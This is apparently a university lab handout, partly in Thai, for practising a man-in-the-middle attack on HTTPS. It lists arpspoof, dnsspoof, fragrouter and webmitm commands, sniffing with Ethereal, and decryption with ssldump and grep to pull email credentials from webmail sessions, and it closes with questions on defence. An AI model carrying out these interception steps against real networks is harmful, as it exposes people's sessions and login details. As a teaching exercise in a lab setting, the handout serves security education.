LAB MITM HTTPS

LAB I: Man-in-the-Middle-Attack HTTS session

Purposes

• Learn about SSL

• Learn the hacker’s tools

• Be aware of the problem and can fix it

Tools

• Auditor Linux Box

Steps:

1. สำรวจเครื่องเหยื่อ

   1. Ipconfig

   2. Keep IP address, Gateway, Subnet Mask

2. Test เครื่องเหยื่อ

• 1. Find out the IP address of the following sites:

                                                              i.      Gmail.com

                                                            ii.      Hotmail.com

                                                          iii.      Mail.yahoo.com

(guide using nslookup) 

1. โจมตี

   1. fragrouter –B1

   2. arpspoof –t victim-ip gateway-ip

   3. dnsspoof

   4. webmitm –d

   5. Ethereal to sniff the session

   6. Let the victim go to the website

   7. Save sniff session to a file (for example, naming it gmail)

   8. ssldump –r gmail –k webmitm.crt –d > gmail.decrypt

   9. check file gmail.decrypt

                                                              i.      vi gmail.decrypt

                                                            ii.      cat gmail.decrypt |grep Email

1. Advanced

   1. Change fragrouter by modifying ‘/proc/systnet/ipv4/ip_forward’ to 1

   2. Arpspoof  -t gateway-ip victim-ip

   3. man fragrouter

   4. man arpspoof

   5. man dnsspoof

   6. man webmitm

2. Lesson Learnt

• 1. Try the hacker tools with ‘gmail.com’, ‘hotmail.com’, ‘yahoo.com’

  2. Together with SSL lecture, what do U learn from this lab.

  3. How do you protect against this threat?

  4. How about ‘hotmail.com’? what have U learnt from its case?

 --กลับขึ้นด้านบน--